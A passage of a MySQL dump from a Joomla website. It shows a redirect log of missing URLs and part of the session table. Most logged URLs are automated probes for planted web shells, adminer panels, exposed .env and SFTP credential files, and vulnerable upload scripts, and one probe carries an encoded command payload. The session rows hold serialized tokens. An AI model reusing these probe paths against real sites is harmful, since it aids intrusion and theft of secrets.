00:00:00',301),(38562,'https://malehus.in.ua/home.php',NULL,'www.google.com','',2,0,'2022-11-21 08:49:40','0000-00-00 00:00:00',301),(38563,'https://malehus.in.ua/moon.php',NULL,'www.google.com','',2,0,'2022-11-21 08:50:15','0000-00-00 00:00:00',301),(38564,'https://malehus.in.ua/wp-content/plugins/akismeet/local.php',NULL,'www.google.com','',2,0,'2022-11-21 08:51:07','0000-00-00 00:00:00',301),(38565,'https://malehus.in.ua/wp-content/plugins/topxoh/oh.php',NULL,'www.google.com','',2,0,'2022-11-21 08:51:15','0000-00-00 00:00:00',301),(38566,'https://malehus.in.ua/help.php',NULL,'www.google.com','',2,0,'2022-11-21 08:52:07','0000-00-00 00:00:00',301),(38567,'https://malehus.in.ua/wp-content/plugins/akismeet/bala.php',NULL,'www.google.com','',2,0,'2022-11-21 08:52:44','0000-00-00 00:00:00',301),(38568,'https://malehus.in.ua/wp-includes/class-index-wordpress.php',NULL,'www.google.com','',2,0,'2022-11-21 08:53:56','0000-00-00 00:00:00',301),(38569,'https://malehus.in.ua/wp-admin/js/widgets/wp-login.php',NULL,'www.google.com','',6,0,'2022-11-21 08:54:41','0000-00-00 00:00:00',301),(38570,'https://malehus.in.ua/wp-includes/wp-system-cloud.php',NULL,'www.google.com','',2,0,'2022-11-21 08:55:23','0000-00-00 00:00:00',301),(38571,'https://malehus.in.ua/wp-includes/class-wp-page-icon.php',NULL,'www.google.com','',2,0,'2022-11-21 08:56:01','0000-00-00 00:00:00',301),(38572,'https://malehus.in.ua/wp-includes/class-wordpress-license.php',NULL,'www.google.com','',2,0,'2022-11-21 08:56:35','0000-00-00 00:00:00',301),(38573,'https://malehus.in.ua/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',3,0,'2022-11-29 12:42:53','0000-00-00 00:00:00',301),(38574,'https://malehus.in.ua/wwoogrvd.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-11-29 14:30:10','0000-00-00 00:00:00',301),(38575,'https://malehus.in.ua/wp-content/plugins/wpputty/wpputty.php',NULL,'','',3,0,'2022-11-30 07:36:14','0000-00-00 00:00:00',301),(38576,'https://malehus.in.ua/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-11-30 17:24:25','0000-00-00 00:00:00',301),(38577,'https://malehus.in.ua/wp-content/plugins/wpzip/wpzip.php',NULL,'','',3,0,'2022-12-01 01:03:16','0000-00-00 00:00:00',301),(38578,'https://www.malehus.in.ua/sadivnytstvo/zasoby-zakhystu/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',1,0,'2022-12-08 12:27:16','0000-00-00 00:00:00',301),(38579,'https://malehus.in.ua/unfbngnj.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-12-10 09:36:38','0000-00-00 00:00:00',301),(38580,'https://malehus.in.ua/dropzone/dropzone-amd-module.min.js',NULL,'','',1,0,'2022-12-13 16:29:15','0000-00-00 00:00:00',301),(38581,'https://www.malehus.in.ua///wp-login.php',NULL,'http://www.google.com.hk','',2,0,'2022-12-14 22:02:37','0000-00-00 00:00:00',301),(38582,'https://malehus.in.ua/dropzone/dropzone.js',NULL,'','',1,0,'2022-12-15 06:28:55','0000-00-00 00:00:00',301),(38583,'https://malehus.in.ua/assets/dropzone/dropzone-amd-module.min.js',NULL,'','',1,0,'2022-12-19 03:27:53','0000-00-00 00:00:00',301),(38584,'https://malehus.in.ua/assets/js/dropzone/dropzone-amd-module.min.js',NULL,'','',1,0,'2022-12-21 07:24:55','0000-00-00 00:00:00',301),(38585,'https://malehus.in.ua/nxypzpgg.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-12-24 10:13:39','0000-00-00 00:00:00',301),(38586,'https://malehus.in.ua/wp-content/plugins/dos2unix/dos2unix.php',NULL,'','',1,0,'2022-12-25 17:13:52','0000-00-00 00:00:00',301),(38587,'https://malehus.in.ua///wp-login.php',NULL,'http://www.google.com.hk','',1,0,'2022-12-26 23:00:42','0000-00-00 00:00:00',301),(38588,'https://malehus.in.ua/assets/js/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-01-02 04:13:45','0000-00-00 00:00:00',301),(38589,'https://malehus.in.ua/holuby/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',1,0,'2023-01-02 17:59:42','0000-00-00 00:00:00',301),(38590,'https://malehus.in.ua/system/elfinder/js/elfinder.js',NULL,'','',1,0,'2023-01-02 19:28:39','0000-00-00 00:00:00',301),(38591,'https://malehus.in.ua/sftp-config.json',NULL,'','',1,0,'2023-01-05 03:33:22','0000-00-00 00:00:00',301),(38592,'https://malehus.in.ua/.vscode/sftp.json',NULL,'','',2,0,'2023-01-05 03:33:23','0000-00-00 00:00:00',301),(38593,'https://malehus.in.ua/8-novini-2/2543-bezpechne-misto-malin',NULL,'','',3,0,'2023-01-05 17:27:04','0000-00-00 00:00:00',301),(38594,'https://malehus.in.ua/https://malehus.in.ua/images/stories/240821.jpg',NULL,'','',1,0,'2023-01-07 01:25:38','0000-00-00 00:00:00',301),(38595,'https://malehus.in.ua/beta/.env',NULL,'','',2,0,'2023-01-09 00:13:23','0000-00-00 00:00:00',301),(38596,'https://malehus.in.ua/kyc/.env',NULL,'','',2,0,'2023-01-09 00:13:37','0000-00-00 00:00:00',301),(38597,'https://malehus.in.ua/frontend/.env',NULL,'','',1,0,'2023-01-09 00:13:41','0000-00-00 00:00:00',301),(38598,'https://malehus.in.ua/prod/.env',NULL,'','',2,0,'2023-01-09 00:13:50','0000-00-00 00:00:00',301),(38599,'https://malehus.in.ua/production/.env',NULL,'','',1,0,'2023-01-09 00:13:53','0000-00-00 00:00:00',301),(38600,'https://malehus.in.ua/home/.env',NULL,'','',1,0,'2023-01-09 00:13:56','0000-00-00 00:00:00',301),(38601,'https://malehus.in.ua/.env.local',NULL,'','',1,0,'2023-01-09 00:14:03','0000-00-00 00:00:00',301),(38602,'https://malehus.in.ua/https://malehus.in.ua/images/stories/photo_2022-01-04_14-12-21.jpg',NULL,'','',1,0,'2023-01-09 06:00:00','0000-00-00 00:00:00',301),(38603,'https://malehus.in.ua/sites/all/modules/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2023-01-12 01:11:41','0000-00-00 00:00:00',301),(38604,'https://malehus.in.ua/wp-content/plugins/seoplugins/index.php',NULL,'','',4,0,'2023-01-13 03:30:47','0000-00-00 00:00:00',301),(38605,'https://malehus.in.ua/wp-content/plugins/seoplugins/mar.php',NULL,'','',4,0,'2023-01-13 03:31:07','0000-00-00 00:00:00',301),(38606,'https://malehus.in.ua/0z.php',NULL,'','',4,0,'2023-01-13 03:31:23','0000-00-00 00:00:00',301),(38607,'https://malehus.in.ua/adminer/',NULL,'','',2,0,'2023-01-14 10:04:56','0000-00-00 00:00:00',301),(38608,'https://malehus.in.ua/adminer/adminer.php',NULL,'','',2,0,'2023-01-14 10:04:56','0000-00-00 00:00:00',301),(38609,'https://malehus.in.ua/adm.php',NULL,'','',2,0,'2023-01-14 10:04:57','0000-00-00 00:00:00',301),(38610,'https://malehus.in.ua/adminer-4.7.7.php',NULL,'','',2,0,'2023-01-14 10:04:57','0000-00-00 00:00:00',301),(38611,'https://malehus.in.ua/adminer-4.8.0.php',NULL,'','',2,0,'2023-01-14 10:04:58','0000-00-00 00:00:00',301),(38612,'https://malehus.in.ua/admin/adminer.php',NULL,'','',2,0,'2023-01-14 10:04:59','0000-00-00 00:00:00',301),(38613,'https://malehus.in.ua/tools/adminer.php',NULL,'','',2,0,'2023-01-14 10:04:59','0000-00-00 00:00:00',301),(38614,'https://malehus.in.ua/adminer-4.7.7-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:00','0000-00-00 00:00:00',301),(38615,'https://malehus.in.ua/adminer-4.7.1.php',NULL,'','',2,0,'2023-01-14 10:05:00','0000-00-00 00:00:00',301),(38616,'https://malehus.in.ua/adminer-4.7.6.php',NULL,'','',2,0,'2023-01-14 10:05:01','0000-00-00 00:00:00',301),(38617,'https://malehus.in.ua/adminer-4.7.5.php',NULL,'','',2,0,'2023-01-14 10:05:01','0000-00-00 00:00:00',301),(38618,'https://malehus.in.ua/adminer-4.6.2.php',NULL,'','',2,0,'2023-01-14 10:05:02','0000-00-00 00:00:00',301),(38619,'https://malehus.in.ua/adminer-4.8.0-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:02','0000-00-00 00:00:00',301),(38620,'https://malehus.in.ua/_adminer.php',NULL,'','',2,0,'2023-01-14 10:05:03','0000-00-00 00:00:00',301),(38621,'https://malehus.in.ua/adminer-4.7.8.php',NULL,'','',2,0,'2023-01-14 10:05:03','0000-00-00 00:00:00',301),(38622,'https://malehus.in.ua/adminer-4.6.3.php',NULL,'','',2,0,'2023-01-14 10:05:04','0000-00-00 00:00:00',301),(38623,'https://malehus.in.ua/adminer-4.7.0.php',NULL,'','',2,0,'2023-01-14 10:05:04','0000-00-00 00:00:00',301),(38624,'https://malehus.in.ua/adminer-4.7.3.php',NULL,'','',2,0,'2023-01-14 10:05:05','0000-00-00 00:00:00',301),(38625,'https://malehus.in.ua/adminer-4.7.3-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:05','0000-00-00 00:00:00',301),(38626,'https://malehus.in.ua/sql.php',NULL,'','',2,0,'2023-01-14 10:05:06','0000-00-00 00:00:00',301),(38627,'https://malehus.in.ua/adminer-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:07','0000-00-00 00:00:00',301),(38628,'https://malehus.in.ua/adminer-4.7.1/',NULL,'','',2,0,'2023-01-14 10:05:07','0000-00-00 00:00:00',301),(38629,'https://malehus.in.ua/adminer-4.7.1-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:08','0000-00-00 00:00:00',301),(38630,'https://malehus.in.ua/adminer-4.6.2-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:08','0000-00-00 00:00:00',301),(38631,'https://malehus.in.ua/adminer-4.7.2.php',NULL,'','',2,0,'2023-01-14 10:05:09','0000-00-00 00:00:00',301),(38632,'https://malehus.in.ua/adminer-4.8.0-en.php',NULL,'','',2,0,'2023-01-14 10:05:09','0000-00-00 00:00:00',301),(38633,'https://malehus.in.ua/adminer1.php',NULL,'','',2,0,'2023-01-14 10:05:10','0000-00-00 00:00:00',301),(38634,'https://malehus.in.ua/adminer-4.7.8-en.php',NULL,'','',2,0,'2023-01-14 10:05:10','0000-00-00 00:00:00',301),(38635,'https://malehus.in.ua/adminer-4.7.8-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:11','0000-00-00 00:00:00',301),(38636,'https://malehus.in.ua/adminer-4.7.7/',NULL,'','',2,0,'2023-01-14 10:05:11','0000-00-00 00:00:00',301),(38637,'https://malehus.in.ua/adminer-4.7.4.php',NULL,'','',2,0,'2023-01-14 10:05:12','0000-00-00 00:00:00',301),(38638,'https://malehus.in.ua/adminer-4.7.6-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:12','0000-00-00 00:00:00',301),(38639,'https://malehus.in.ua/adm/adminer.php',NULL,'','',2,0,'2023-01-14 10:05:13','0000-00-00 00:00:00',301),(38640,'https://malehus.in.ua/adminer-4.7.5-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:13','0000-00-00 00:00:00',301),(38641,'https://malehus.in.ua/adminer-4.7.5-en.php',NULL,'','',2,0,'2023-01-14 10:05:14','0000-00-00 00:00:00',301),(38642,'https://malehus.in.ua/adminer-4.7.7-en.php',NULL,'','',2,0,'2023-01-14 10:05:15','0000-00-00 00:00:00',301),(38643,'https://malehus.in.ua/adminer-4.7.0-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:15','0000-00-00 00:00:00',301),(38644,'https://malehus.in.ua/adminer-4.7.1-mysql-en.php',NULL,'','',2,0,'2023-01-14 10:05:16','0000-00-00 00:00:00',301),(38645,'https://malehus.in.ua/adminer-4.6.2-mysql-en.php',NULL,'','',2,0,'2023-01-14 10:05:16','0000-00-00 00:00:00',301),(38646,'https://malehus.in.ua/adminer-4.8.0-mysql-en.php',NULL,'','',2,0,'2023-01-14 10:05:17','0000-00-00 00:00:00',301),(38647,'https://malehus.in.ua/adminer-4.6.3-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:17','0000-00-00 00:00:00',301),(38648,'https://malehus.in.ua/adminer-4.6.1.php',NULL,'','',2,0,'2023-01-14 10:05:18','0000-00-00 00:00:00',301),(38649,'https://malehus.in.ua/adminer-4.7.4/',NULL,'','',2,0,'2023-01-14 10:05:18','0000-00-00 00:00:00',301),(38650,'https://malehus.in.ua/adminer-4.7.7-mysql-en.php',NULL,'','',2,0,'2023-01-14 10:05:19','0000-00-00 00:00:00',301),(38651,'https://malehus.in.ua/adminer-4.6.2-en.php',NULL,'','',2,0,'2023-01-14 10:05:19','0000-00-00 00:00:00',301),(38652,'https://malehus.in.ua/data/adminer.php',NULL,'','',2,0,'2023-01-14 10:05:20','0000-00-00 00:00:00',301),(38653,'https://malehus.in.ua/mysql.php',NULL,'','',2,0,'2023-01-14 10:05:20','0000-00-00 00:00:00',301),(38654,'https://malehus.in.ua/adminer-4.8.0/',NULL,'','',2,0,'2023-01-14 10:05:21','0000-00-00 00:00:00',301),(38655,'https://malehus.in.ua/phpmyadmin.php',NULL,'','',2,0,'2023-01-14 10:05:22','0000-00-00 00:00:00',301),(38656,'https://malehus.in.ua/adminer-4.6.2/',NULL,'','',2,0,'2023-01-14 10:05:22','0000-00-00 00:00:00',301),(38657,'https://malehus.in.ua/adminer-4.7.8/',NULL,'','',2,0,'2023-01-14 10:05:23','0000-00-00 00:00:00',301),(38658,'https://malehus.in.ua/manager/adminer.php',NULL,'','',2,0,'2023-01-14 10:05:23','0000-00-00 00:00:00',301),(38659,'https://malehus.in.ua/adminer-4.6.3-mysql-en.php',NULL,'','',2,0,'2023-01-14 10:05:24','0000-00-00 00:00:00',301),(38660,'https://malehus.in.ua/adminer-4.6.3/',NULL,'','',2,0,'2023-01-14 10:05:24','0000-00-00 00:00:00',301),(38661,'https://malehus.in.ua/adminer-4.7.4-mysql.php',NULL,'','',2,0,'2023-01-14 10:05:25','0000-00-00 00:00:00',301),(38662,'https://malehus.in.ua/system/elfinder/files/jpeg.php',NULL,'','',1,0,'2023-01-14 21:32:16','0000-00-00 00:00:00',301),(38663,'https://malehus.in.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'','',1,0,'2023-01-17 01:43:06','0000-00-00 00:00:00',301),(38664,'https://malehus.in.ua/assets/modules/catalogfill/tpl/valums-file-uploader/upload.php',NULL,'','',3,0,'2023-01-19 11:23:56','0000-00-00 00:00:00',301),(38665,'https://malehus.in.ua/images/pageglare.png',NULL,'https://malehus.in.ua/holuby/informatsiia-holubivnykam','',1,0,'2023-01-21 08:10:12','0000-00-00 00:00:00',301),(38666,'https://malehus.in.ua/images/object1090043310.png',NULL,'https://malehus.in.ua/holuby/informatsiia-holubivnykam','',1,0,'2023-01-21 08:10:13','0000-00-00 00:00:00',301),(38667,'https://malehus.in.ua/images/spacer.gif',NULL,'https://malehus.in.ua/holuby/informatsiia-holubivnykam','',1,0,'2023-01-21 08:10:13','0000-00-00 00:00:00',301),(38668,'https://malehus.in.ua/images/menuseparator.png',NULL,'https://malehus.in.ua/holuby/informatsiia-holubivnykam','',1,0,'2023-01-21 08:10:13','0000-00-00 00:00:00',301),(38669,'https://malehus.in.ua/images/header.jpg',NULL,'https://malehus.in.ua/holuby/informatsiia-holubivnykam','',1,0,'2023-01-21 08:10:14','0000-00-00 00:00:00',301),(38670,'https://malehus.in.ua/wp-cc.php',NULL,'','',1,0,'2023-01-21 22:34:20','0000-00-00 00:00:00',301),(38671,'https://malehus.in.ua/fpyjsdea.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-01-22 20:55:24','0000-00-00 00:00:00',301),(38672,'https://malehus.in.ua/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2023-01-26 05:09:20','0000-00-00 00:00:00',301),(38673,'https://malehus.in.ua/public/client/planinfo',NULL,'','',1,0,'2023-01-27 00:36:09','0000-00-00 00:00:00',301),(38674,'https://malehus.in.ua/symfony/_profiler/phpinfo',NULL,'','',1,0,'2023-01-27 00:36:10','0000-00-00 00:00:00',301),(38675,'https://malehus.in.ua/login?pp=enable&pp=env',NULL,'','',1,0,'2023-01-27 00:36:10','0000-00-00 00:00:00',301),(38676,'https://malehus.in.ua/helpers/utility.js',NULL,'','',1,0,'2023-01-27 00:36:11','0000-00-00 00:00:00',301),(38677,'https://malehus.in.ua/config/config.json',NULL,'','',1,0,'2023-01-27 00:36:11','0000-00-00 00:00:00',301),(38678,'https://malehus.in.ua/laravel/core/.env',NULL,'','',1,0,'2023-01-27 00:36:12','0000-00-00 00:00:00',301),(38679,'https://malehus.in.ua/wp-content/plugins/ip-logger/chart/ofc_upload_image.php',NULL,'','',1,0,'2023-01-27 12:24:33','0000-00-00 00:00:00',301),(38680,'https://malehus.in.ua/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2023-01-29 00:05:52','0000-00-00 00:00:00',301),(38681,'https://malehus.in.ua/admin/login.php',NULL,'','',1,0,'2023-01-30 03:32:05','0000-00-00 00:00:00',301),(38682,'https://malehus.in.ua/wp-json/wp/v2/posts',NULL,'malehus.in.ua/wp-json/wp/v2/posts','',3,0,'2023-01-30 05:12:46','0000-00-00 00:00:00',301),(38683,'https://malehus.in.ua/sites/all/modules/plupload/plupload/examples/upload.php',NULL,'','',1,0,'2023-02-02 22:50:09','0000-00-00 00:00:00',301),(38684,'https://malehus.in.ua/composer.json',NULL,'','',1,0,'2023-02-03 20:06:18','0000-00-00 00:00:00',301),(38685,'https://malehus.in.ua/database.php',NULL,'','',2,0,'2023-02-04 03:05:36','0000-00-00 00:00:00',301),(38686,'https://malehus.in.ua/sendgrid.env',NULL,'http://malehus.in.ua/sendgrid.env','',2,0,'2023-02-07 06:11:43','0000-00-00 00:00:00',301),(38687,'https://www.malehus.in.ua/.vscode/sftp.json',NULL,'','',1,0,'2023-02-09 08:26:42','0000-00-00 00:00:00',301),(38688,'https://malehus.in.ua/public/home/js/check.js',NULL,'','',2,0,'2023-02-09 20:27:46','0000-00-00 00:00:00',301),(38689,'https://www.malehus.in.ua/public/home/js/check.js',NULL,'','',2,0,'2023-02-09 20:27:47','0000-00-00 00:00:00',301),(38690,'https://malehus.in.ua/static/admin/javascript/hetong.js',NULL,'','',2,0,'2023-02-09 20:27:48','0000-00-00 00:00:00',301),(38691,'https://www.malehus.in.ua/static/admin/javascript/hetong.js',NULL,'','',2,0,'2023-02-09 20:27:49','0000-00-00 00:00:00',301),(38692,'https://malehus.in.ua/core/ckeditor/plugins/elfinder/elfinder.html',NULL,'','',1,0,'2023-02-10 18:17:46','0000-00-00 00:00:00',301),(38693,'https://malehus.in.ua/js/elfinder/php/connector.php',NULL,'','',1,0,'2023-02-14 10:25:41','0000-00-00 00:00:00',301),(38694,'https://malehus.in.ua/ckeditor/plugins/filemanager/index.html',NULL,'','',1,0,'2023-02-16 16:26:20','0000-00-00 00:00:00',301);
/*!40000 ALTER TABLE `fw3gt_redirect_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_schemas`
--

DROP TABLE IF EXISTS `fw3gt_schemas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_schemas` (
  `extension_id` int(11) NOT NULL,
  `version_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_schemas`
--

LOCK TABLES `fw3gt_schemas` WRITE;
/*!40000 ALTER TABLE `fw3gt_schemas` DISABLE KEYS */;
INSERT INTO `fw3gt_schemas` VALUES (21,'3.5.1'),(700,'3.9.8-2019-06-11'),(10049,'2.1.2'),(10124,'3.1-2013-04-29'),(10386,'4.4.0'),(10425,'4.3.14');
/*!40000 ALTER TABLE `fw3gt_schemas` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_session`
--

DROP TABLE IF EXISTS `fw3gt_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_session` (
  `session_id` varbinary(192) NOT NULL,
  `client_id` tinyint(3) unsigned DEFAULT NULL,
  `guest` tinyint(3) unsigned DEFAULT '1',
  `time` int(11) NOT NULL DEFAULT '0',
  `data` longtext COLLATE utf8mb4_unicode_ci,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`),
  KEY `client_id_guest` (`client_id`,`guest`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_session`
--

LOCK TABLES `fw3gt_session` WRITE;
/*!40000 ALTER TABLE `fw3gt_session` DISABLE KEYS */;
INSERT INTO `fw3gt_session` VALUES (_binary '006afd46c41879a5be0ba81a168c49f4',0,1,1676163040,'joomla|s:888:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjE2MzAzOTtzOjQ6Imxhc3QiO2k6MTY3NjE2MzAzOTtzOjM6Im5vdyI7aToxNjc2MTYzMDM5O31zOjU6InRva2VuIjtzOjMyOiJKVFlNMlg2N2tTYnZTR3NPSXNpNmR0QkxNeDJTYkZqbyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjQ2OiImcmV0dXJuPWFIUjBjSE02THk5M2QzY3ViV0ZzWldoMWN5NXBiaTUxWVM4JTJGIjt9fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),(_binary '014872637ae20c19be308aec35c8ab61',0,1,1676526631,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjYzMTtzOjQ6Imxhc3QiO2k6MTY3NjUyNjYzMTtzOjM6Im5vdyI7aToxNjc2NTI2NjMxO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '06c0d9321a8f490b651b4525cc5eab85',0,1,1676526577,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjUyNjU3NztzOjQ6Imxhc3QiO2k6MTY3NjUyNjU3NztzOjM6Im5vdyI7aToxNjc2NTI2NTc3O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary '07717c415f82c44761f2ebef422a08c9',0,1,1676248585,'joomla|s:904:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjI0ODU4NTtzOjQ6Imxhc3QiO2k6MTY3NjI0ODU4NTtzOjM6Im5vdyI7aToxNjc2MjQ4NTg1O31zOjU6InRva2VuIjtzOjMyOiIzQ0dXeTV5VmplRjI4NlV6VmNodUI0UHJybUJob0FZNiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjE1OiJjb21fYXR0YWNobWVudHMiO086ODoic3RkQ2xhc3MiOjE6e3M6MTE6ImN1cnJlbnRfdXJsIjtzOjU4OiImcmV0dXJuPWFIUjBjSE02THk5dFlXeGxhSFZ6TG1sdUxuVmhMM05oWkdsMmJubDBjM1IyYno4JTNEIjt9fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";',0,''),(_binary '0781221e5500b70246fe5c21f7114544',0,1,1676160756,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY3NjE2MDc1NjtzOjQ6Imxhc3QiO2k6MTY3NjE2MDc1NjtzOjM6Im5vdyI7aToxNjc2MTYwNzU2O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 